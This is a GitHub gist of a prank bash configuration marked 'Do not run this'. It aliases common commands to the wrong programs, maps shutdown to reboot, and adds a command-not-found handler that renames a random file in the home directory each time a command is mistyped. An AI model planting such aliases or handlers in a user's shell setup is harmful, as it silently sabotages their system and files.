Skip to content

Instantly share code, notes, and snippets.

@polprog
Last active November 6, 2015 19:27
Show Gist options
  • Save polprog/579068848fa37a0e7dea to your computer and use it in GitHub Desktop.
Save polprog/579068848fa37a0e7dea to your computer and use it in GitHub Desktop.
#Do not run this !!!
#IO operations
alias less='cat'
alias sed='awk'
#administration
alias apt-get='aptitude'
#file editing
alias emacs='vim'
#alias vim='emacs'
alias rm=`nano`
alias man='where'
alias shutdown='reboot' #this will break stuff
command_not_found_handle () {
clear;
cd ~;
FILE=`ls | shuf | head -n 1`
mv $FILE "$FILE.old" #Original backup script
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment